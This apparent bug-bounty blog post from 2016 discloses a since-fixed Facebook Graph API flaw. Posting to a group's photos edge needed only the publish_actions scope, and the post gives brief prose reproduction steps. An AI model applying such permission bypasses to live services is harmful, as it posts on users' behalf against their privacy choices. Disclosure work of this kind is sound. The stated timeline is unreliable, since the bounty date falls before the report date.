Publishing to /group/photos/ without sufficient permissions - Facebook Bug

02 Aug 2016

Update : It is found that this issue was already reported by Philippe Harewood and fixed by Facebook even before my report. This is just another example of how code changes must have caused the same vulnerability to reappear.

Description

According to Facebook’s Graph API documentation about publishing to groups other than ‘App and Games groups’, publish_actions and either user_managed_groups or user_groups permissions are needed.

It was found possible to publish through the photos edge without setting user_managed_groups or user_groups scope, but only publish_actions in the access_token.

Impact:

It posts an update to the attacker targeted group (ofcourse, victim should be a member of) EVEN if the user had only granted ‘ONLY ME’ privacy mode for posts while allowing the access token.

Reproduction:

Get an access_token for Graph API Explorer from a test account with publish_actions scope set.
Using Graph API Explorer, make a post on behalf of the user to the ‘photos’ edge of node {group-id}.
Use the POST field url and point it an image url.
Complete the request.

It returns an id and post_id after posting the update. Facebook fixed the vulnerability after it was reported to them.

 
Report sent : 02 Sep 2015 
Escalation : 22 Sep 2015 
Fix : Sometime after rewarding the bounty.
Bounty awarded : 04 May 2015

Thanks for reading!

PageFault

Publishing to /group/photos/ without sufficient permissions - Facebook Bug

Description

Impact:

Reproduction:

Related Posts

Leaking access tokens from Microsoft apps chaining two vulnerabilities 12 Dec 2018

Unvalidated URL Redirect - Facebook Bug Bounty 12 Jan 2017

Leaking Facebook appsecret_proof - Private Bounty 12 Nov 2016